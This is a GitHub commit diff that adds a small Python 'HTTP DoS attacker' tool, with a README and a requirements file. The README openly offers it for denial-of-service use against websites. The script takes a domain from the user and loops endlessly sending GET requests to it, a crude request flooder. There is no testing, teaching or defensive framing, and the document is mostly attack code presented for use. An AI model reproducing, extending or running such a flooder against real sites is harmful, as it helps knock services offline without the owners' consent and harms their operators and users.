File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 1- # DoS-Attack-Tool
2-
1+ # Dos HTTP attacker
2+ this is python app to dos to http site.
3+
4+ it cannot bypass cloudflare or any anti ddos.
5+
6+ but, it could be used! so you can use this tool as well.
7+
8+ LICENSE: [ APPACHE 2] ( LICENSE )
Original file line number Diff line number Diff line change 1+ import os
2+ from time import sleep
3+ import colorama
4+ from colorama import Fore
5+ from colorama import Back
6+ import requests
7+ os .system ("cls" )
8+ print (Fore .WHITE + Back .BLUE + "HTTP DOS ATTACKER\n Made by github.com/ghalbeyou !\n " )
9+ sleep (5 )
10+ os .system ("cls" )
11+ ip = input (">> DOMAIN: " )
12+ url = "http://" + ip
13+ os .system ("cls" )
14+ while True :
15+ print (Fore .RED + Back .BLACK + "\n >> Sending a new connecting ..." )
16+ r = requests .get (url )
17+ if r .status_code == 200 :
18+ print (Fore .GREEN + "\n >> Request send!" )
19+ else :
20+ print (Fore .RED + "Cannot send, gotting this status code: " + str (r .status_code ))
Original file line number Diff line number Diff line change 1+ colorama == 0.4.4
2+ requests == 2.27.1
You can’t perform that action at this time.
0 commit comments